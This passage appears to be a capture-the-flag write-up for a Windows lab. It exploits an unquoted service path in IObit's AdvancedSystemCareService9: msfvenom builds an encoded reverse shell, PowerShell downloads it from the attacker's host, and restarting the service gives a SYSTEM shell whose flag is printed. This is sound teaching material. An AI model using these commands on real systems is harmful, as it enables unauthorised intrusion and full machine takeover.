Stopped  FDResPub           Function Discovery Resource Publica...
Running  FontCache          Windows Font Cache Service            
Running  gpsvc              Group Policy Client                   
Stopped  hidserv            Human Interface Device Service        
Stopped  hkmsvc             Health Key and Certificate Management 
Stopped  IEEtwCollectorS... Internet Explorer ETW Collector Ser...
Running  IKEEXT             IKE and AuthIP IPsec Keying Modules   
Stopped  IObitUnSvr         IObit Uninstaller Service             
Running  iphlpsvc           IP Helper                             
Stopped  KeyIso             CNG Key Isolation                     
Stopped  KPSSVC             KDC Proxy Server service (KPS)        
Stopped  KtmRm              KtmRm for Distributed Transaction C...
Running  LanmanServer       Server                                
Running  LanmanWorkstation  Workstation                           
Running  LiveUpdateSvc      LiveUpdate                            
Stopped  lltdsvc            Link-Layer Topology Discovery Mapper  
Running  lmhosts            TCP/IP NetBIOS Helper                 
Running  LSM                Local Session Manager                 
Stopped  MMCSS              Multimedia Class Scheduler            
Running  MpsSvc             Windows Firewall                      
Running  MSDTC              Distributed Transaction Coordinator   
Stopped  MSiSCSI            Microsoft iSCSI Initiator Service     
Stopped  msiserver          Windows Installer                     
Stopped  napagent           Network Access Protection Agent       
Stopped  NcaSvc             Network Connectivity Assistant        
Stopped  Netlogon           Netlogon                              
Stopped  Netman             Network Connections                   
Running  netprofm           Network List Service                  
Stopped  NetTcpPortSharing  Net.Tcp Port Sharing Service          
Running  NlaSvc             Network Location Awareness            
Running  nsi                Network Store Interface Service       
Stopped  PerfHost           Performance Counter DLL Host          
Stopped  pla                Performance Logs & Alerts             
Running  PlugPlay           Plug and Play                         
Running  PolicyAgent        IPsec Policy Agent                    
Running  Power              Power                                 
Stopped  PrintNotify        Printer Extensions and Notifications  
Running  ProfSvc            User Profile Service                  
Stopped  PsShutdownSvc      PsShutdown                            
Stopped  RasAuto            Remote Access Auto Connection Manager 
Stopped  RasMan             Remote Access Connection Manager      
Stopped  RemoteAccess       Routing and Remote Access             
Stopped  RemoteRegistry     Remote Registry                       
Running  RpcEptMapper       RPC Endpoint Mapper                   
Stopped  RpcLocator         Remote Procedure Call (RPC) Locator   
Running  RpcSs              Remote Procedure Call (RPC)           
Stopped  RSoPProv           Resultant Set of Policy Provider      
Stopped  sacsvr             Special Administration Console Helper 
Running  SamSs              Security Accounts Manager             
Stopped  SCardSvr           Smart Card                            
Stopped  ScDeviceEnum       Smart Card Device Enumeration Service 
Running  Schedule           Task Scheduler                        
Stopped  SCPolicySvc        Smart Card Removal Policy             
Stopped  seclogon           Secondary Logon                       
Running  SENS               System Event Notification Service     
Running  SessionEnv         Remote Desktop Configuration          
Stopped  SharedAccess       Internet Connection Sharing (ICS)     
Running  ShellHWDetection   Shell Hardware Detection              
Stopped  smphost            Microsoft Storage Spaces SMP          
Stopped  SNMPTRAP           SNMP Trap                             
Running  Spooler            Print Spooler                         
Running  sppsvc             Software Protection                   
Stopped  SSDPSRV            SSDP Discovery                        
Stopped  SstpSvc            Secure Socket Tunneling Protocol Se...
Stopped  svsvc              Spot Verifier                         
Stopped  swprv              Microsoft Software Shadow Copy Prov...
Stopped  SysMain            Superfetch                            
Running  SystemEventsBroker System Events Broker                  
Stopped  TapiSrv            Telephony                             
Running  TermService        Remote Desktop Services               
Running  Themes             Themes                                
Stopped  THREADORDER        Thread Ordering Server                
Stopped  TieringEngineSe... Storage Tiers Management              
Running  TrkWks             Distributed Link Tracking Client      
Stopped  TrustedInstaller   Windows Modules Installer             
Running  UALSVC             User Access Logging Service           
Stopped  UI0Detect          Interactive Services Detection        
Running  UmRdpService       Remote Desktop Services UserMode Po...
Stopped  upnphost           UPnP Device Host                      
Stopped  VaultSvc           Credential Manager                    
Running  vds                Virtual Disk                          
Stopped  vmicguestinterface Hyper-V Guest Service Interface       
Stopped  vmicheartbeat      Hyper-V Heartbeat Service             
Stopped  vmickvpexchange    Hyper-V Data Exchange Service         
Stopped  vmicrdv            Hyper-V Remote Desktop Virtualizati...
Stopped  vmicshutdown       Hyper-V Guest Shutdown Service        
Stopped  vmictimesync       Hyper-V Time Synchronization Service  
Stopped  vmicvss            Hyper-V Volume Shadow Copy Requestor  
Stopped  VSS                Volume Shadow Copy                    
Running  W32Time            Windows Time                          
Stopped  w3logsvc           W3C Logging Service                   
Running  W3SVC              World Wide Web Publishing Service     
Running  WAS                Windows Process Activation Service    
Running  Wcmsvc             Windows Connection Manager            
Stopped  WcsPlugInService   Windows Color System                  
Stopped  WdiServiceHost     Diagnostic Service Host               
Stopped  WdiSystemHost      Diagnostic System Host                
Stopped  Wecsvc             Windows Event Collector               
Stopped  WEPHOSTSVC         Windows Encryption Provider Host Se...
Stopped  wercplsupport      Problem Reports and Solutions Contr...
Stopped  WerSvc             Windows Error Reporting Service       
Running  WinHttpAutoProx... WinHTTP Web Proxy Auto-Discovery Se...
Running  Winmgmt            Windows Management Instrumentation    
Running  WinRM              Windows Remote Management (WS-Manag...
Running  WLMS               Windows Licensing Monitoring Service  
Stopped  wmiApSrv           WMI Performance Adapter               
Stopped  WPDBusEnum         Portable Device Enumerator Service    
Stopped  WSService          Windows Store Service (WSService)     
Stopped  wuauserv           Windows Update                        
Stopped  wudfsvc            Windows Driver Foundation - User-mo...



C:\>

Answer: powershell -c Get-Service

#3

Intsructions

Now let’s escalate to Administrator with our new found knowledge.

Generate your payload using msfvenom and pull it to the system using powershell.

Now we can move our payload to the unquoted directory winPEAS alerted us to and restart the service with two commands.

First we need to stop the service which we can do like so:

sc stop AdvancedSystemCareService9

Shortly followed by:

sc start AdvancedSystemCareService9

Once this command runs, you will see you gain a shell as Administrator on our listener!

Solution

Hint: msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=443 -e x86/shikata_ga_nai -f exe -o Advanced.exe

Let’s start by generating our reverse shell and make it available through our python web server:

root@kali:/data/tmp# msfvenom -p windows/shell/reverse_tcp LHOST=10.8.50.72 LPORT=9999 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe

Open a handler listening on the port you specified in the previous command:

root@kali:/data/tmp# rlwrap nc -nlvp 9999
listening on [any] 9999 ...

Now, from the reverse shell, let’s download our executable, and restart the service:

C:\Program Files (x86)\IObit>powershell -c "Invoke-WebRequest -Uri 'http://10.8.50.72/Advanced.exe' -OutFile 'c:\program files (x86)\IObit\Advanced.exe'"
C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING 
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 2  START_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2692
        FLAGS              : 

Now, we can get the flag from our new reverse shell:

connect to [10.8.50.72] from (UNKNOWN) [10.10.186.107] 61367

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>more c:\users\administrator\desktop\root.txt
more c:\users\administrator\desktop\root.txt
9af5f314f57607c00fd09803a587db80